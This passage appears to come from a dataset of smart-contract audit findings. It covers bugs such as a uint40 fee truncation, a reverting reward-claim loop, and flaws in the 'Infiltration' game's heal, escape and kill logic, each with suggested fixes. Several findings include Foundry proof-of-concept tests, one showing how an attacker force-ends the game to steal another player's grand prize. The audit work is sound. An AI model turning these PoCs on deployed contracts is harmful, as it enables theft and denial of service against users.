Although a fee of `1.1M` is large, it is not impossible.\\n`interfaceFee.amount` is defined as `uint48` the legality check also uses `type(uint48).max`, but `uint40` is used when saving.\\n```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n\\nWe can see that when saving, 
it is forcibly converted to `uint40`, as in `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`. The order can be saved successfully, but the actual storage may be truncated to `0`.ч```\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n// Remove the line below\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n// Add the line below\\n uint48(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\nчFor orders where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully, but the actual storage may be truncated to `0`. This is not what users expect and may lead to incorrect fee payments when the order is executed. 
Although a fee of `1.1M` is large, it is not impossible.ч```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n -vault.claimReward() If have a market without reward token, it may cause all markets to be unable to retrieve rewards.чmediumчIn `vault.claimReward()`, it will 
loop through all `market` of `vault` to execute `claimReward()`, and transfer `rewards` to `factory().owner()`. If one of the markets does not have `rewards`, that is, `rewardToken` is not set, `Token18 reward = address(0)`. Currently, the loop does not make this judgment `reward != address(0)`, it will also execute `market.claimReward()`, and the entire method will `revert`. This leads to other markets with `rewards` also being unable to retrieve `rewards`.\\nThe current implementation of `vault.claimReward()` is as follows:\\n```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n\\nWe can see that the method loops through all the `market` and executes `market.claimReward()`, and `reward().push()`.\\nThe problem is, not every market has `rewards` tokens. market.sol's `rewards` are not forcibly set in `initialize()`. 
The market's `makerRewardRate.makerRewardRate` is also allowed to be 0.\\n```\\ncontract Market is IMarket, Instance, ReentrancyGuard {\\n /// @dev The token that incentive rewards are paid in\\n Token18 public reward;\\n\\n function initialize(IMarket.MarketDefinition calldata definition_) external initializer(1) {\\n __Instance__initialize();\\n __ReentrancyGuard__initialize();\\n\\n token = definition_.token;\\n oracle = definition_.oracle;\\n payoff = definition_.payoff;\\n }\\n// rest of code\\n\\n\\nlibrary MarketParameterStorageLib {\\n// rest of code\\n function validate(\\n MarketParameter memory self,\\n ProtocolParameter memory protocolParameter,\\n Token18 reward\\n ) public pure {\\n if (self.settlementFee.gt(protocolParameter.maxFeeAbsolute)) revert MarketParameterStorageInvalidError();\\n\\n if (self.fundingFee.max(self.interestFee).max(self.positionFee).gt(protocolParameter.maxCut))\\n revert MarketParameterStorageInvalidError();\\n\\n if (self.oracleFee.add(self.riskFee).gt(UFixed6Lib.ONE)) revert MarketParameterStorageInvalidError();\\n\\n if (\\n reward.isZero() &&\\n (!self.makerRewardRate.isZero() || !self.longRewardRate.isZero() || !self.shortRewardRate.isZero())\\n ) revert MarketParameterStorageInvalidError();\\n```\\n\\nThis means that `market.sol` can be without `rewards token`.\\nIf there is such a market, the current `vault.claimReward()` will `revert`, causing other markets with `rewards` to also be unable to retrieve `rewards`.ч```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (_registrations[marketId].read().market.reward().isZero()) continue;\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\nчIf the `vault` contains markets without `rewards`, it will cause other markets with `rewards` to also be 
unable to retrieve `rewards`.ч```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n -_killWoundedAgentsчhighчThe `_killWoundedAgents` function only checks the status of the agent, not when it was wounded.\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n\\nSo when `fulfillRandomWords` kills agents that were wounded and unhealed at round `currentRoundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD`, it will also kill the agent who was healed and wounded again after that round.\\nAlso, since `fulfillRandomWords` first draws the new wounded agents before kills agents, in the worst case scenario, agent could die immediately after being wounded in this round.\\n```\\nif (activeAgents > NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n uint256 woundedAgents = _woundRequestFulfilled(\\n currentRoundId,\\n currentRoundAgentsAlive,\\n activeAgents,\\n currentRandomWord\\n );\\n\\n uint256 deadAgentsFromKilling;\\n if (currentRoundId > ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD) {\\n deadAgentsFromKilling = _killWoundedAgents({\\n roundId: currentRoundId.unsafeSubtract(ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD),\\n currentRoundAgentsAlive: currentRoundAgentsAlive\\n });\\n }\\n```\\n\\nThis is the PoC test code. 
You can add it to the Infiltration.fulfillRandomWords.t.sol file and run it.\\n```\\nfunction test_poc() public {\\n\\n _startGameAndDrawOneRound();\\n\\n uint256[] memory randomWords = _randomWords();\\n uint256[] memory woundedAgentIds;\\n\\n for (uint256 roundId = 2; roundId <= ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1; roundId++) {\\n\\n if(roundId == 2) { // heal agent. only woundedAgentIds[0] dead.\\n (woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 1});\\n assertEq(woundedAgentIds.length, 20);\\n\\n _drawXRounds(1);\\n\\n _heal({roundId: 3, woundedAgentIds: woundedAgentIds});\\n\\n _startNewRound();\\n\\n // everyone except woundedAgentIds[0] is healed\\n uint256 agentIdThatWasKilled = woundedAgentIds[0];\\n\\n IInfiltration.HealResult[] memory healResults = new IInfiltration.HealResult[](20);\\n for (uint256 i; i < 20; i++) {\\n healResults[i].agentId = woundedAgentIds[i];\\n\\n if (woundedAgentIds[i] == agentIdThatWasKilled) {\\n healResults[i].outcome = IInfiltration.HealOutcome.Killed;\\n } else {\\n healResults[i].outcome = IInfiltration.HealOutcome.Healed;\\n }\\n }\\n\\n expectEmitCheckAll();\\n emit HealRequestFulfilled(3, healResults);\\n\\n expectEmitCheckAll();\\n emit RoundStarted(4);\\n\\n randomWords[0] = (69 * 10_000_000_000) + 9_900_000_000; // survival rate 99%, first one gets killed\\n\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(3), randomWords);\\n\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n if (woundedAgentIds[i] != agentIdThatWasKilled) {\\n _assertHealedAgent(woundedAgentIds[i]);\\n }\\n }\\n\\n roundId += 2; // round 2, 3 used for healing\\n }\\n\\n _startNewRound();\\n\\n // Just so that each round has different random words\\n randomWords[0] += roundId;\\n\\n if (roundId == ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1) { // wounded agents at round 1 are healed, only woundedAgentIds[0] was dead.\\n (uint256[] memory woundedAgentIdsFromRound, ) = 
infiltration.getRoundInfo({\\n roundId: uint40(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD)\\n });\\n\\n // find re-wounded agent after healed\\n uint256[] memory woundedAfterHeal = new uint256[](woundedAgentIds.length);\\n uint256 totalWoundedAfterHeal;\\n for (uint256 i; i < woundedAgentIds.length; i ++){\\n uint256 index = infiltration.agentIndex(woundedAgentIds[i]);\\n IInfiltration.Agent memory agent = infiltration.getAgent(index);\\n if (agent.status == IInfiltration.AgentStatus.Wounded) {\\n woundedAfterHeal[i] = woundedAgentIds[i]; // re-wounded agent will be killed\\n totalWoundedAfterHeal++;\\n }\\n else{\\n woundedAfterHeal[i] = 0; // set not wounded again 0\\n }\\n\\n }\\n expectEmitCheckAll();\\n emit Killed(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD, woundedAfterHeal);\\n }\\n\\n expectEmitCheckAll();\\n emit RoundStarted(roundId + 1);\\n\\n uint256 requestId = _computeVrfRequestId(uint64(roundId));\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(requestId, randomWords);\\n }\\n}\\n```\\nчCheck woundedAt at `_killWoundedAgents`\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n// Remove the line below\\n if (agents[index].status == AgentStatus.Wounded) {\\n// Add the line below\\n if (agents[index].status == AgentStatus.Wounded && agents[index].woundedAt == roundId) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\nчThe user pays tokens to keep the agent alive, but agent will die even if agent success to healed. 
The user has lost tokens and is forced out of the game.ч```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n -Attacker can steal reward of actual winner by force ending the gameчhighчCurrently following scenario is possible: There is an attacker owning some lower index agents and some higher index agents. There is a normal user owing one agent with an index between the attackers agents. If one of the attackers agents with an lower index gets wounded, he can escape all other agents and will instantly win the game, even if the other User has still one active agent.\\nThis is possible because because the winner is determined by the agent index, and escaping all agents at once wont kill the wounded agent because the game instantly ends.\\nFollowing check inside startNewRound prevents killing of wounded agents by starting a new round:\\n```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n\\nFollowing check inside of claimPrize pays price to first ID agent:\\n```\\nuint256 agentId = agents[1].agentId;\\n_assertAgentOwnership(agentId);\\n```\\n\\nSee following POC:\\nPOC\\nPut this into Infiltration.mint.t.sol and run `forge test --match-test forceWin -vvv`\\n```\\nfunction test_forceWin() public {\\n address attacker = address(1337);\\n\\n //prefund attacker and user1\\n vm.deal(user1, PRICE * MAX_MINT_PER_ADDRESS);\\n vm.deal(attacker, PRICE * MAX_MINT_PER_ADDRESS);\\n\\n // MINT some agents\\n vm.warp(_mintStart());\\n // attacker wants to make sure he owns a bunch of agents 
with low IDs!!\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n // For simplicity we mint only 1 agent to user 1 here, but it could be more, they could get wounded, etc.\\n vm.prank(user1);\\n infiltration.mint{value: PRICE *1}({quantity: 1});\\n //Attacker also wants a bunch of agents with the highest IDs, as they are getting swapped with the killed agents (move forward)\\n vm.prank(attacker);\\n infiltration.mint{value: PRICE * 30}({quantity: 30});\\n \\n vm.warp(_mintEnd());\\n\\n //start the game\\n vm.prank(owner);\\n infiltration.startGame();\\n\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n randomWords[0] = 69_420;\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(1), randomWords);\\n // Now we are in round 2 we do have 1 wounded agent (but we can imagine any of our agent got wounded, doesn´t really matter)\\n \\n // we know with our HARDCODED RANDOMNESS THAT AGENT 3 gets wounded!!\\n\\n // Whenever we get in a situation, that we own all active agents, but 1 and our agent has a lower index we can instant win the game!!\\n // This is done by escaping all agents, at once, except the lowest index\\n uint256[] memory escapeIds = new uint256[](59);\\n escapeIds[0] = 1;\\n escapeIds[1] = 2;\\n uint256 i = 4; //Scipping our wounded AGENT 3\\n for(; i < 31;) {\\n escapeIds[i-2] = i;\\n unchecked {++i;}\\n }\\n //skipping 31 as this owned by user1\\n unchecked {++i;}\\n for(; i < 62;) {\\n escapeIds[i-3] = i;\\n unchecked {++i;}\\n }\\n vm.prank(attacker);\\n infiltration.escape(escapeIds);\\n\\n (uint16 activeAgents, uint16 woundedAgents, , uint16 deadAgents, , , , , , , ) = infiltration.gameInfo();\\n console.log(\"Active\", activeAgents);\\n assertEq(activeAgents, 1);\\n // This will end the game instantly.\\n //owner should not be able to start new round\\n vm.roll(block.number + BLOCKS_PER_ROUND);\\n vm.prank(owner);\\n vm.expectRevert();\\n 
infiltration.startNewRound();\\n\\n //Okay so the game is over, makes sense!\\n // Now user1 has the only active AGENT, so he should claim the grand prize!\\n // BUT user1 cannot\\n vm.expectRevert(IInfiltration.NotAgentOwner.selector);\\n vm.prank(user1);\\n infiltration.claimGrandPrize();\\n\\n //instead the attacker can:\\n vm.prank(attacker);\\n infiltration.claimGrandPrize();\\n \\n```\\nчStart a new Round before the real end of game to clear all wounded agents and reorder IDs.чAttacker can steal the grand price of the actual winner by force ending the game trough escapes.\\nThis also introduces problems if there are other players with wounded agents but lower < 50 TokenID, they can claim prices for wounded agents, which will break parts of the game logic.ч```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n -Agents with Healing Opportunity Will Be Terminated Directly if The `escape` Reduces activeAgents to the Number of `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS` or FewerчmediumчIn each round, agents have the opportunity to either `escape` or `heal` before the `_requestForRandomness` function is called. However, the order of execution between these two functions is not specified, and anyone can be executed at any time just before `startNewRound`. Typically, this isn't an issue. 
However, the problem arises when there are only a few Active Agents left in the game.\\nOn one hand, the `heal` function requires that the number of `gameInfo.activeAgents` is greater than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`.\\n```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n\\nOn the other hand, the `escape` function will directly set the status of agents to \"ESCAPE\" and reduce the count of `gameInfo.activeAgents`.\\n```\\n function escape(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n\\n uint256 agentIdsCount = agentIds.length;\\n _assertNotEmptyAgentIdsArrayProvided(agentIdsCount);\\n\\n uint256 activeAgents = gameInfo.activeAgents;\\n uint256 activeAgentsAfterEscape = activeAgents - agentIdsCount;\\n _assertGameIsNotOverAfterEscape(activeAgentsAfterEscape);\\n\\n uint256 currentRoundAgentsAlive = agentsAlive();\\n\\n uint256 prizePool = gameInfo.prizePool;\\n uint256 secondaryPrizePool = gameInfo.secondaryPrizePool;\\n uint256 reward;\\n uint256[] memory rewards = new uint256[](agentIdsCount);\\n\\n for (uint256 i; i < agentIdsCount; ) {\\n uint256 agentId = agentIds[i];\\n _assertAgentOwnership(agentId);\\n\\n uint256 index = agentIndex(agentId);\\n _assertAgentStatus(agents[index], agentId, AgentStatus.Active);\\n\\n uint256 totalEscapeValue = prizePool / currentRoundAgentsAlive;\\n uint256 rewardForPlayer = (totalEscapeValue * _escapeMultiplier(currentRoundAgentsAlive)) /\\n ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n rewards[i] = rewardForPlayer;\\n reward += rewardForPlayer;\\n\\n uint256 rewardToSecondaryPrizePool = (totalEscapeValue.unsafeSubtract(rewardForPlayer) *\\n _escapeRewardSplitForSecondaryPrizePool(currentRoundAgentsAlive)) / ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n\\n 
unchecked {\\n prizePool = prizePool - rewardForPlayer - rewardToSecondaryPrizePool;\\n }\\n secondaryPrizePool += rewardToSecondaryPrizePool;\\n\\n _swap({\\n currentAgentIndex: index,\\n lastAgentIndex: currentRoundAgentsAlive,\\n agentId: agentId,\\n newStatus: AgentStatus.Escaped\\n });\\n\\n unchecked {\\n --currentRoundAgentsAlive;\\n ++i;\\n }\\n }\\n\\n // This is equivalent to\\n // unchecked {\\n // gameInfo.activeAgents = uint16(activeAgentsAfterEscape);\\n // gameInfo.escapedAgents += uint16(agentIdsCount);\\n // }\\n```\\n\\nThrerefore, if the `heal` function is invoked first then the corresponding Wounded Agents will be healed in function `fulfillRandomWords`. If the `escape` function is invoked first and the number of `gameInfo.activeAgents` becomes equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the `heal` function will be disable. This obviously violates the fairness of the game.\\nExample\\nConsider the following situation:\\nAfter Round N, there are 100 agents alive. And, 1 Active Agent wants to `escape` and 10 Wounded Agents want to `heal`.\\nRound N:\\nActive Agents: 51\\nWounded Agents: 49\\nHealing Agents: 0\\nAccording to the order of execution, there are two situations. Please note that the result is calculated only after `_healRequestFulfilled`, so therer are no new wounded or dead agents\\nFirst, invoking `escape` before `heal`. `heal` is disable and all Wounded Agents are killed because there are not enough Active Agents.\\nRound N+1:\\nActive Agents: 50\\nWounded Agents: 0\\nHealing Agents: 0\\nSecond, invoking `heal` before `escape`. Suppose that `heal` saves 5 agents, and we got:\\nRound N+1:\\nActive Agents: 55\\nWounded Agents: 39\\nHealing Agents: 0\\nObviously, different execution orders lead to drastically different outcomes, which affects the fairness of the game.чIt is advisable to ensure that the `escape` function is always called after the `heal` function in every round. 
This guarantees that every wounded agent has the opportunity to `heal` themselves when there are a sufficient number of `activeAgents` at the start of each round. This approach can enhance fairness and gameplay balance.чIf some Active Agents choose to escape, causing the count of `activeAgents` to become equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the Wounded Agents will lose their final chance to heal themselves.\\nThis situation can significantly impact the game's fairness. The Wounded Agents would have otherwise had the opportunity to heal themselves and continue participating in the game. However, the escape of other agents leads to their immediate termination, depriving them of that chance.ч```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n -Wound agent can't invoke heal in the next roundчmediumчAssume players being marked as wounded in the round `12` , players cannot invoke `heal` in the next round 13\\n```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n 
assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\nч```\\n // No need to check if the heal deadline has passed as the agent would be killed\\n unchecked {\\n- if (currentRoundId - woundedAt < 2) {\\n- if (currentRoundId - woundedAt < 1) {\\n revert HealingMustWaitAtLeastOneRound();\\n }\\n }\\n```\\nчUser have to wait for 1 more round which led to the odds for an Agent to heal successfully start at 99% at Round 1 reduce to 98% at Round 2.ч```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n -fulfillRandomWords() could revert under certain circumstancesчmediumчCrucial part of my POC is the variable AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS. I communicated with the protocol's team that they plan to set it to 20 initially but it is possible to have a different value for it in future. 
For the POC i used 30.\\n```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n\\nI put this test into Infiltration.startNewRound.t.sol and used --gas-report to see that the gas used for fulfillRandomWords exceeds 2 500 000.чA couple of ideas :\\nYou can limit the value of AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS to a small enough number so that it is 100% sure it will not reach the gas limit.\\nConsider simply storing the randomness and taking more complex follow-on actions in separate contract calls as stated in the \"Security Considerations\" section of the VRF's docs.чDOS of the protocol and inability to continue the game.ч```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n 
counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n -Oracle.sol: manipulation via increasing Uniswap V3 pool observationCardinalityчhighчThe `Oracle.consult` function takes a `uint40 seed` parameter and can be used in either of two ways:\\nSet the highest 8 bit to a non-zero value to use Uniswap V3's binary search to get observations\\nSet the highest 8 bit to zero and use the lower 32 bits to provide hints and use the more efficient internal `Oracle.observe` function to get the observations\\nThe code for Aloe's `Oracle.observe` function is adapted from Uniswap V3's Oracle library.\\nTo understand this issue it is necessary to understand Uniswap V3's `observationCardinality` concept.\\nA deep dive can be found here.\\nIn short, it is a circular array of variable size. The size of the array can be increased by ANYONE via calling `Pool.increaseObservationCardinalityNext`.\\nThe Uniswap V3 `Oracle.write` function will then take care of actually expanding the array once the current index has reached the end of the array.\\nAs can be seen in this function, uninitialized entries in the array have their timestamp set to `1`.\\nAnd all other values in the observation struct (array element) are set to zero:\\n```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick 